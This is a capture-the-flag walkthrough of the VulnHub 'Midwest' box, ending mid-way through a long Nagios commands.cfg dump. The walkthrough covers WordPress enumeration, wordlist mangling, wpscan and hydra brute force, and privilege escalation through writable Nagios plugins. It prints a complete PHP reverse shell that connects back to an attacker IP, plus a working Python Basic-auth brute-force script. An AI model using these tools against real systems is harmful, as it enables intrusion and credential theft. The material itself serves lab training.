Box hints
WordPress pentesting, custom wordlist generation, hydra brute force, Nagios local privilege escalation
Box download
https://download.vulnhub.com/midwest/midwest-v1.0.1.ova
Information gathering
Host discovery
nmap -sn 192.168.8.0/24

Port scan
nmap -sT --min-rate 10000 -p- 192.168.8.224

Service and version detection
nmap -sT -sC -sV -O -p80,22 192.168.8.225 -oN ports
Only one web service was found (port 80; 22 is SSH)

Vulnerability scan
nmap --script=vuln -p80 192.168.8.225
The scripts identify the site as WordPress

Configure hosts
The box redirects to a domain name (www.midwest.htb), so map the box's IP to that name in /etc/hosts before going further

Directory scan
dirsearch -u http://www.midwest.htb
The scan also turns up a Nagios instance under /nagios

WordPress pentesting
wpscan --url http://www.midwest.htb/ -e u --plugins-detection aggressive --api-token <your wpscan.com API token>
User enumeration finds a single username: admin

WordPress password brute force
Generate a small wordlist by crawling the site
cewl http://www.midwest.htb > pass.txt
wpscan --url http://www.midwest.htb/ -U User.txt -P pass.txt
The small wordlist produced no valid login (User.txt holds the one enumerated username, admin)
The large rockyou wordlist
wpscan --url http://www.midwest.htb/ -U User.txt -P /usr/share/wordlists/rockyou.txt
About a tenth of rockyou was tried with no result

Generate a mangled wordlist with john
Feed the crawled words through john's wordlist rules (case changes, appended digits, doubled words and so on) to produce a sorted, deduplicated list of candidates; sorting discards john's most-likely-first order, which does not matter when the whole list is tried anyway:
john --rules --wordlist=pass.txt --stdout | sort -u > wordlist.txt
wpscan --url http://www.midwest.htb -U User.txt -P wordlist.txt
This yields valid credentials: admin/Power9
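To make the mangling step concrete, here is an added example (not part of the original write-up, and not john itself) that reimplements a small subset of john's default [List.Rules:Wordlist] in Python and shows how one crawled stem produces both passwords recovered on this box. The seed list is constructed; only the stem "power" comes from the write-up's results.

```python
import string

# Constructed seed list standing in for cewl's output (`cewl http://www.midwest.htb`).
# Only the stem "power" is taken from the write-up; the other words are made up.
SEED_WORDS = ["power", "Midwest", "nagios", "monitoring"]


def case_variants(word):
    """john rules ':' (as is), 'l' (lowercase), 'c' (capitalise), 'u' (uppercase)."""
    return {word, word.lower(), word.capitalize(), word.upper()}


def mangle(word):
    """Apply a subset of john's default [List.Rules:Wordlist] to one word and
    return every candidate it produces."""
    out = set()
    for w in case_variants(word):
        out.add(w)
        out.add(w + w)                    # d         duplicate: Power -> PowerPower
        out.add(w + "s")                  # p         crude plural
        out.add(w[::-1])                  # r         reverse
        for digit in string.digits:       # Az"[0-9]" append one digit: Power -> Power9
            out.add(w + digit)
        for suffix in ("!", "123", "2023", "2024"):   # Az"..." common suffixes
            out.add(w + suffix)
    return out


def build_wordlist(seeds, min_len=4):
    """Equivalent of `john --rules --wordlist=pass.txt --stdout | sort -u`:
    mangle every seed, drop candidates shorter than min_len, return a sorted unique list."""
    candidates = set()
    for seed in seeds:
        seed = seed.strip()
        if seed:
            candidates.update(c for c in mangle(seed) if len(c) >= min_len)
    return sorted(candidates)


if __name__ == "__main__":
    wordlist = build_wordlist(SEED_WORDS)
    print(f"{len(SEED_WORDS)} seeds -> {len(wordlist)} candidates")
    for target in ("Power9", "PowerPower"):
        print(target, "hit" if target in wordlist else "miss")
```

john's real default ruleset is far larger (it also inserts characters, toggles individual letters and combines rules), so the list it emits from the same seeds is several times longer; the point of this cut-down version is to show why a site-specific wordlist of a few hundred entries can beat ten million lines of rockyou.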

Reverse shell
Writing a reverse shell into the theme's 404 page fails
First attempt: paste the pentestmonkey php-reverse-shell into the theme's 404.php through the theme editor:
<?php
// pentestmonkey php-reverse-shell (v1.0); only the ip/port below were changed for this box
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.8.148';  // CHANGE THIS
$port = 8888;           // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0);  // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    global $daemon;  // read the flag set above; without this the function always prints
    if (!$daemon) {
        print "$string\n";
    }
}

?>

This ran into a problem: WordPress reports that the theme source cannot be edited here, and only file uploads are allowed

Reverse shell via plugin upload

Prepare the reverse-shell file

The uploader only accepts .zip files

Intercept the upload request and change the file extension

The uploaded shell and its path are visible in the Media library
Requesting that path triggers the reverse shell

Nagios pentesting
A quick search shows that Nagios's default admin account is nagiosadmin

Brute-forcing HTTP basic authentication
- Response: 401 Unauthorized (with a WWW-Authenticate: Basic header)
- Request signature: Authorization: Basic YWRtaW46c2VjcmV0, i.e. base64 of user:password (this sample decodes to admin:secret)
Use hydra's basic-auth module against it, reusing the john-generated wordlist:
hydra -l nagiosadmin -P wordlist.txt http-get://www.midwest.htb/nagios

Credentials recovered: nagiosadmin/PowerPower (another john mangling of the same seed word)
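What hydra's http-get module does is simple enough to show end to end. The following added example (my code, not hydra's and not part of the write-up) encodes and decodes the Basic credential, stands up a constructed mock of the /nagios realm on a loopback port, and runs the sequential guessing loop against it, treating 401 as "wrong password" and anything else as a signal to stop rather than a miss. The mock server and its realm string are assumptions; the credential it accepts is the one the write-up recovered.

```python
import base64
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Constructed mock target standing in for http://www.midwest.htb/nagios.
# The credential is the one recovered in the write-up; the server itself is fake.
MOCK_USER, MOCK_PASS = "nagiosadmin", "PowerPower"


def basic_header(user, password):
    """Build the value hydra's http-get module sends: 'Basic ' + base64(user:password)."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def decode_basic(header_value):
    """Inverse of basic_header; e.g. 'Basic YWRtaW46c2VjcmV0' -> ('admin', 'secret')."""
    scheme, _, blob = header_value.strip().partition(" ")
    if scheme.lower() != "basic":
        raise ValueError("not a Basic credential")
    user, _, password = base64.b64decode(blob, validate=True).decode().partition(":")
    return user, password


class MockNagiosHandler(BaseHTTPRequestHandler):
    """Answers 401 + WWW-Authenticate until the right Authorization header arrives."""

    def do_GET(self):
        try:
            ok = decode_basic(self.headers.get("Authorization", "")) == (MOCK_USER, MOCK_PASS)
        except (ValueError, UnicodeDecodeError):
            ok = False
        if ok:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"Nagios Core")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="Nagios Access"')
            self.end_headers()

    def log_message(self, *args):  # keep the demo output clean
        pass


def start_mock_server():
    """Bind an ephemeral loopback port and serve in a daemon thread; returns the server."""
    server = HTTPServer(("127.0.0.1", 0), MockNagiosHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def try_login(url, user, password, timeout=5):
    """One guess: True on HTTP 200, False on 401, re-raise anything else
    (a 403/429 or a connection error means lockout or rate limiting, not a wrong password)."""
    req = Request(url, headers={"Authorization": basic_header(user, password)})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.status == 200
    except HTTPError as err:
        if err.code == 401:
            return False
        raise


def brute_force(url, user, candidates):
    """Sequential equivalent of `hydra -l USER -P wordlist http-get://HOST/PATH`."""
    for password in candidates:
        if try_login(url, user, password):
            return password
    return None


if __name__ == "__main__":
    srv = start_mock_server()
    target = f"http://127.0.0.1:{srv.server_port}/nagios/"
    print(decode_basic("Basic YWRtaW46c2VjcmV0"))
    print(brute_force(target, "nagiosadmin", ["Power9", "power", "PowerPower"]))
    srv.shutdown()
```

Because Basic credentials are only base64, any capture of the request (a proxy log, a pcap of plain HTTP as on this box) hands over the password directly; that is also why a single valid Authorization header replayed against /nagios is all the access that is needed once the brute force succeeds.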

The Nagios UI shows the version number
Tried to get a shell from the Nagios web interface itself
No usable exploit script was found for it

Privilege escalation
Nagios privilege escalation
There is a nagios user on the box

So the escalation most likely goes through Nagios itself
Nagios is a free, open-source monitoring tool (Nagios XI is the commercial edition) that monitors Windows, Linux, Unix hosts, routers and switches, covering both the physical resources and the services of a given host
Looking through the Nagios installation, commands.cfg is where the check commands are defined, so it is a natural place to inject a command

Locate the file
find / -name "commands.cfg" 2>/dev/null
It is writable

A great many commands are configured; in them
$USER1$
is a macro (set in resource.cfg) that normally points to the Nagios plugin directory

/usr/local/nagios/libexec/
Traces of previous attackers were already there

Every script in this directory is writable. Nagios runs these plugins as its own service user on the check schedule, so writing a reverse shell into one and waiting for the matching check to fire yields a shell as nagios. The command definitions from commands.cfg:
define command {
command_name check-host-alive
command_line $USER1$/check_icmp -H $HOSTADDRESS$ -w 3000.0,80% -c 5000.0,100% -p 5
}
define command {
command_name check-host-alive-http
command_line $USER1$/check_http -H $HOSTADDRESS$
}
define command {
command_name check-host-alive-tftp
command_line tftp $HOSTNAME$ 69
}
define command {
command_name check_bpi
command_line /usr/bin/php $USER1$/check_bpi.php $ARG1$
}
define command {
command_name check_capacity_planning
command_line $USER1$/check_capacity_planning.py $ARG1$ $ARG2$
}
define command {
command_name check_dhcp
command_line $USER1$/check_dhcp $ARG1$
}
define command {
command_name check_dir
command_line $USER1$/check_dir -d $ARG1$ -w $ARG2$ -c $ARG3$ $ARG4$
}
define command {
command_name check_dns
command_line $USER1$/check_dns -H $HOSTNAME$ $ARG1$
}
define command {
command_name check_docker
command_line $USER1$/check_docker.py $ARG1$
}
define command {
command_name check_dummy
command_line $USER1$/check_dummy $ARG1$ $ARG2$
}
define command {
command_name check_ec2
command_line $USER1$/check_ec2.py $ARG1$
}
define command {
command_name check_em01_humidity
command_line $USER1$/check_em01.pl --type=hum --hum=$ARG1$,$ARG2$ $HOSTADDRESS$
}
define command {
command_name check_em01_light
command_line $USER1$/check_em01.pl --type=illum --illum=$ARG1$,$ARG2$ $HOSTADDRESS$
}
define command {
command_name check_em01_temp
command_line $USER1$/check_em01.pl --type=temp --temp=$ARG1$,$ARG2$ $HOSTADDRESS$
}
define command {
command_name check_em08_contacts
command_line $USER1$/check_em08 $HOSTADDRESS$ C
}
define command {
command_name check_em08_humidity
command_line $USER1$/check_em08 $HOSTADDRESS$ H $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_em08_light
command_line $USER1$/check_em08 $HOSTADDRESS$ I $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_em08_rtd
command_line $USER1$/check_em08 $HOSTADDRESS$ R $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_em08_temp
command_line $USER1$/check_em08 $HOSTADDRESS$ T $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_em08_voltage
command_line $USER1$/check_em08 $HOSTADDRESS$ V $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_email_delivery
command_line $USER1$/check_email_delivery $ARG1$
}
define command {
command_name check_exchange_rbl
command_line $USER1$/check_bl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_file_service
command_line $USER1$/folder_watch.pl $ARG1$ $ARG2$ -f
}
define command {
command_name check_file_size_age
command_line $USER1$/folder_watch.pl $ARG1$ $ARG2$ -f
}
define command {
command_name check_ftp
command_line $USER1$/check_ftp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_ftp_fully
command_line $USER1$/check_ftp_fully "$ARG1$" "$ARG2$" "$ARG3$" $HOSTNAME$
}
define command {
command_name check_hpjd
command_line $USER1$/check_hpjd -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_http
command_line $USER1$/check_http -I $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_icmp
command_line $USER1$/check_ping -H $HOSTADDRESS$ -w $ARG1$ -c $ARG2$
}
define command {
command_name check_imap
command_line $USER1$/check_imap -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_json
command_line php $USER1$/check_json.php $ARG1$
}
define command {
command_name check_local_disk
command_line $USER1$/check_disk -w $ARG1$ -c $ARG2$ -p $ARG3$
}
define command {
command_name check_local_load
command_line $USER1$/check_load -w $ARG1$ -c $ARG2$
}
define command {
command_name check_local_mem
command_line $USER1$/custom_check_mem -w $ARG1$ -c $ARG2$ -n
}
define command {
command_name check_local_mrtgtraf
command_line $USER1$/check_mrtgtraf -F $ARG1$ -a $ARG2$ -w $ARG3$ -c $ARG4$ -e $ARG5$
}
define command {
command_name check_local_procs
command_line $USER1$/check_procs -w $ARG1$ -c $ARG2$ -s $ARG3$
}
define command {
command_name check_local_swap
command_line $USER1$/check_swap -w $ARG1$ -c $ARG2$
}
define command {
command_name check_local_users
command_line $USER1$/check_users -w $ARG1$ -c $ARG2$
}
define command {
command_name check_mailserver_rbl
command_line $USER1$/check_bl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_mongodb_database
command_line $USER1$/check_mongodb.py -H $HOSTADDRESS$ -A $ARG1$ -P $ARG2$ -W $ARG3$ -C $ARG4$ -u $ARG5$ -p $ARG6$ -d $ARG7$ -D
}
define command {
command_name check_mongodb_server
command_line $USER1$/check_mongodb.py -H $HOSTADDRESS$ -A $ARG1$ -P $ARG2$ -W $ARG3$ -C $ARG4$ -u $ARG5$ -p $ARG6$ -D --all-databases
}
define command {
command_name check_mountpoint
command_line $USER1$/check_mountpoints.sh $ARG1$
}
define command {
command_name check_nagiosxi_performance
command_line /usr/bin/php $USER1$/check_nagios_performance.php $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_nagios_performance
command_line $USER1$/check_nagios_performance -o $ARG1$ $ARG2$
}
define command {
command_name check_none
command_line /bin/true
}
define command {
command_name check_nrpe
command_line $USER1$/check_nrpe -H $HOSTADDRESS$ -t 30 -c $ARG1$ $ARG2$
}
define command {
command_name check_nrpeversion
command_line $USER1$/check_nrpe -H $HOSTADDRESS$
}
define command {
command_name check_nt
command_line $USER1$/check_nt -H $HOSTADDRESS$ -p $USER7$ -s $USER8$ -v $ARG1$ $ARG2$
}
define command {
command_name check_php_snmp_bandwidth
command_line $USER1$/get_snmp.php -H=$HOSTADDRESS$ -C=$ARG1$ -2 -I=$ARG2$ -u -w=$ARG3$ -c=$ARG4$ -d=$ARG5$
}
define command {
command_name check_ping
command_line $USER1$/check_ping -H $HOSTADDRESS$ -w $ARG1$ -c $ARG2$ -p 5
}
define command {
command_name check_pop
command_line $USER1$/check_pop -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_proc_usage
command_line $USER1$/check_proc_usage -p $ARG1$ $ARG2$
}
define command {
command_name check_radius_server_py
command_line $USER1$/check_radius.py -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_s3
command_line $USER1$/check_s3.py $ARG1$
}
define command {
command_name check_smtp
command_line $USER1$/check_smtp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_snmp
command_line $USER1$/check_snmp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_snmp_int
command_line $USER1$/check_snmp_int.pl -H $HOSTADDRESS$ -C $ARG1$ -2 -n $ARG2$ -f -k -w $ARG3$ -c $ARG4$ $ARG5$
}
define command {
command_name check_ssh
command_line $USER1$/check_ssh $ARG1$ $HOSTADDRESS$
}
define command {
command_name check_tcp
command_line $USER1$/check_tcp -H $HOSTADDRESS$ -p $ARG1$ $ARG2$
}
define command {
command_name check_tftp_connect
command_line $USER1$/check_tftp.sh --connect $ARG1$
}
define command {
command_name check_tftp_get
command_line $USER1$/check_tftp.sh --get $ARG1$ '$ARG2$' $ARG3$
}
define command {
command_name check_udp
command_line $USER1$/check_udp -H $HOSTADDRESS$ -p $ARG1$ $ARG2$
}
define command {
command_name check_vmware_api_guest
command_line $USER1$/check_vmware_api.pl -H "$HOSTADDRESS$" -f "$ARG1$" -N "$ARG2$" -l "$ARG3$" $ARG4$
}
define command {
command_name check_vmware_api_host
command_line $USER1$/check_vmware_api.pl -H "$HOSTADDRESS$" -f "$ARG1$" -l "$ARG2$" $ARG3$
}
define command {
command_name check_xi_by_ssh
command_line $USER1$/check_by_ssh -H $HOSTADDRESS$ $ARG1$ $ARG2$
}
define command {
command_name check_xi_deface
command_line $USER1$/check_http -H $HOSTADDRESS$ -r '$ARG1$' -u '$ARG2$' $ARG3$
}
define command {
command_name check_xi_domain_v2
command_line $USER1$/check_domain.php -d $ARG1$ $ARG2$ $ARG3$
}
define command {
command_name check_xi_host_http
command_line $USER1$/check_http -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_host_ping
command_line $USER1$/check_icmp -H $HOSTADDRESS$ -w $ARG1$,$ARG2$ -c $ARG3$,$ARG4$ -p 5
}
define command {
command_name check_xi_hyperv
command_line $USER1$/check_ncpa.py -H $HOSTADDRESS$ -t $_HOSTNCPA_TOKEN$ -P $_HOSTNCPA_PORT$ -M $ARG1$ -w $ARG2$ -c $ARG3$
}
define command {
command_name check_xi_java_as
command_line JAVA_ABS_PATH -Djava.class.path=$ARG2$:$USER1$/check_jvm.jar GenericASCheck $ARG1$
}
define command {
command_name check_xi_java_weblogic
command_line $USER1$/check_wlsagent.sh $ARG1$
}
define command {
command_name check_xi_mssql_database2
command_line $USER1$/check_mssql_server.php -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_mssql_query
command_line $USER1$/check_mssql -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_mssql_server2
command_line $USER1$/check_mssql_server.php -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_mysql_health
command_line $USER1$/check_mysql_health $ARG1$
}
define command {
command_name check_xi_mysql_query
command_line $USER1$/check_mysql_health $ARG1$
}
define command {
command_name check_xi_nagiosxiserver
command_line /usr/bin/php $USER1$/check_nagiosxiserver.php $ARG1$
}
define command {
command_name check_xi_ncpa
command_line $USER1$/check_ncpa.py -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_nna
command_line $USER1$/check_nna.py -H $HOSTADDRESS$ -K $ARG1$ $ARG2$
}
define command {
command_name check_xi_oraclequery
command_line . /usr/local/nagiosxi/etc/configwizards/oracle/oracle && $USER1$/check_oracle_health $ARG1$
}
define command {
command_name check_xi_oracleserverspace
command_line . /usr/local/nagiosxi/etc/configwizards/oracle/oracle && $USER1$/check_oracle_health $ARG1$
}
define command {
command_name check_xi_oracletablespace
command_line . /usr/local/nagiosxi/etc/configwizards/oracle/oracle && $USER1$/check_oracle_health $ARG1$
}
define command {
command_name check_xi_postgres
command_line $USER1$/check_postgres.pl $ARG1$
}
define command {
command_name check_xi_postgres_db
command_line $USER1$/check_postgres.pl $ARG1$
}
define command {
command_name check_xi_postgres_query
command_line $USER1$/check_postgres.pl $ARG1$
}
define command {
command_name check_xi_service_dns
command_line $USER1$/check_dns -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_dnsquery
command_line $USER1$/check_dns $ARG1$
}
define command {
command_name check_xi_service_ftp
command_line $USER1$/check_ftp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_hpjd
command_line $USER1$/check_hpjd -H $HOSTADDRESS$ -C $ARG1$
}
define command {
command_name check_xi_service_http
command_line $USER1$/check_http -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_http_cert
command_line $USER1$/check_http -H $HOSTADDRESS$ -C $ARG1$
}
define command {
command_name check_xi_service_http_content
command_line $USER1$/check_http -H $HOSTADDRESS$ --onredirect=follow -s "$ARG1$"
}
define command {
command_name check_xi_service_ifoperstatus
command_line $USER1$/check_ifoperstatus -H $HOSTADDRESS$ -C $ARG1$ -k $ARG2$ $ARG3$
}
define command {
command_name check_xi_service_ifoperstatusnag
command_line $USER1$/check_ifoperstatnag $ARG1$ $ARG2$ $HOSTADDRESS$
}
define command {
command_name check_xi_service_imap
command_line $USER1$/check_imap -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_ldap
command_line $USER1$/check_ldap -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_mrtgtraf
command_line $USER1$/check_rrdtraf -f /var/lib/mrtg/$ARG1$ -w $ARG2$ -c $ARG3$ -l $ARG4$
}
define command {
command_name check_xi_service_nagioslogserver
command_line $USER1$/check_nagioslogserver.php $ARG1$
}
define command {
command_name check_xi_service_none
command_line $USER1$/check_dummy 0 "Nothing to monitor"
}
define command {
command_name check_xi_service_nsclient
command_line $USER1$/check_nt -H $HOSTADDRESS$ -s "$ARG1$" -p 12489 -v $ARG2$ $ARG3$ $ARG4$
}
define command {
command_name check_xi_service_ping
command_line $USER1$/check_icmp -H $HOSTADDRESS$ -w $ARG1$,$ARG2$ -c $ARG3$,$ARG4$ -p 5
}
define command {
command_name check_xi_service_pop
command_line $USER1$/check_pop -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_smtp
command_line $USER1$/check_smtp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp
command_line $USER1$/check_snmp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_linux_load
command_line $USER1$/check_snmp_load_wizard.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_linux_process
command_line $USER1$/check_snmp_process_wizard.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_linux_storage
command_line $USER1$/check_snmp_storage_wizard.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_watchguard
command_line $USER1$/check_snmp_generic.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_win_load
command_line $USER1$/check_snmp_load.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_win_process
command_line $USER1$/check_snmp_process.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_win_service
command_line $USER1$/check_snmp_win.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_snmp_win_storage
command_line $USER1$/check_snmp_storage.pl -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_ssh
command_line $USER1$/check_ssh $ARG1$ $HOSTADDRESS$
}
define command {
command_name check_xi_service_status
command_line sudo /usr/local/nagiosxi/scripts/manage_services.sh status $ARG1$
}
define command {
command_name check_xi_service_tcp
command_line $USER1$/check_tcp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_udp
command_line $USER1$/check_udp -H $HOSTADDRESS$ $ARG1$
}
define command {
command_name check_xi_service_webinject
command_line $USER1$/check_webinject.sh $ARG1$
}
define command {
command_name check_xi_service_wmiplus
command_line $USER1$/check_wmi_plus.pl -H $HOSTADDRESS$ -u $ARG1$ -p $ARG2$ -m $ARG3$ $ARG4$
}
define command {
command_name check_xi_service_wmiplus_authfile
command_line $USER1$/check_wmi_plus.pl -H $HOSTADDRESS$ -A $ARG1$ -m $ARG2$ $ARG3$
}
define command {
command_name check_xi_sla2
command_line $USER1$/check_xi_sla.php $ARG1$
}
define command {
command_name check_xml
command_line php $USER1$/check_xml.php $ARG1$
}
define command {
command_name notify-host-by-email
command_line /usr/bin/printf "%b" "***** Nagios Monitor XI Alert *****\n\nNotification Type: $NOTIFICATIONTYPE$\nHost: $HOSTNAME$\nState: $HOSTSTATE$\nAddress: $HOSTADDRESS$\nInfo: $HOSTOUTPUT$\n\nDate/Time: $LONGDATETIME$\n" | /bin/mail -s "** $NOTIFICATIONTYPE$ Host Alert: $HOSTNAME$ is $HOSTSTATE$ **" $CONTACTEMAIL$
}
define command {
command_name notify-service-by-email
command_line /usr/bin/printf "%b" "***** Nagios Monitor XI Alert *****\n\nNotification Type: $NOTIFICATIONTYPE$\n\nService: $SERVICEDESC$\nHost: $HOSTALIAS$\nAddress: $HOSTADDRESS$\nState: $SERVICESTATE$\n\nDate/Time: $LONGDATETIME$\n\nAdditional Info:\n\n$SERVICEOUTPUT$" | /bin/mail -s "** $NOTIFICATIONTYPE$ Service Alert: $HOSTALIAS$/$SERVICEDESC$ is $SERVICESTATE$ **" $CONTACTEMAIL$
}
define command {
command_name process-host-perfdata-file-bulk
command_line /bin/mv /usr/local/nagios/var/host-perfdata /usr/local/nagios/var/spool/xidpe/$TIMET$.perfdata.host
}
define command {
command_name process-host-perfdata-file-pnp-bulk
command_line /bin/mv /usr/local/nagios/var/host-perfdata /usr/local/nagios/var/spool/perfdata/host-perfdata.$TIMET$
}
define command {
command_name process-host-perfdata-pnp-normal
command_line /usr/bin/perl /usr/local/nagios/libexec/process_perfdata.pl -d HOSTPERFDATA
}
define command {
command_name process-service-perfdata-file-bulk
command_line /bin/mv /usr/local/nagios/var/service-perfdata /usr/local/nagios/var/spool/xidpe/$TIMET$.perfdata.service
}
define command {
command_name process-service-perfdata-file-pnp-bulk
command_line /bin/mv /usr/local/nagios/var/service-perfdata /usr/local/nagios/var/spool/perfdata/service-perfdata.$TIMET$
}
define command {
command_name process-service-perfdata-pnp-normal
command_line /usr/bin/perl /usr/local/nagios/libexec/process_perfdata.pl
}
define command {
command_name xi_host_event_handler
command_line /usr/bin/php /usr/local/nagiosxi/scripts/handle_nagioscore_event.php --handler-type=host --host="$HOSTNAME$" --hostaddress="$HOSTADDRESS$" --hoststate=$HOSTSTATE$ --hoststateid=$HOSTSTATEID$ --lasthoststate=$LASTHOSTSTATE$ --lasthoststateid=$LASTHOSTSTATEID$ --hoststatetype=$HOSTSTATETYPE$ --currentattempt=$HOSTATTEMPT$ --maxattempts=$MAXHOSTATTEMPTS$ --hosteventid=$HOSTEVENTID$ --hostproblemid=$HOSTPROBLEMID$ --hostoutput="$HOSTOUTPUT$" --longhostoutput="$LONGHOSTOUTPUT$" --hostdowntime=$HOSTDOWNTIME$
}
define command {
command_name xi_host_notification_handler
command_line /usr/bin/php /usr/local/nagiosxi/scripts/handle_nagioscore_notification.php --notification-type=host --contact="$CONTACTNAME$" --contactemail="$CONTACTEMAIL$" --type=$NOTIFICATIONTYPE$ --escalated="$NOTIFICATIONISESCALATED$" --author="$NOTIFICATIONAUTHOR$" --comments="$NOTIFICATIONCOMMENT$" --host="$HOSTNAME$" --hostaddress="$HOSTADDRESS$" --hostalias="$HOSTALIAS$" --hostdisplayname="$HOSTDISPLAYNAME$" --hoststate=$HOSTSTATE$ --hoststateid=$HOSTSTATEID$ --lasthoststate=$LASTHOSTSTATE$ --lasthoststateid=$LASTHOSTSTATEID$ --hoststatetype=$HOSTSTATETYPE$ --currentattempt=$HOSTATTEMPT$ --maxattempts=$MAXHOSTATTEMPTS$ --hosteventid=$HOSTEVENTID$ --hostproblemid=$HOSTPROBLEMID$ --hostoutput="$HOSTOUTPUT$" --longhostoutput="$LONGHOSTOUTPUT$" --datetime="$LONGDATETIME$"
}
define command {
command_name xi_service_event_handler
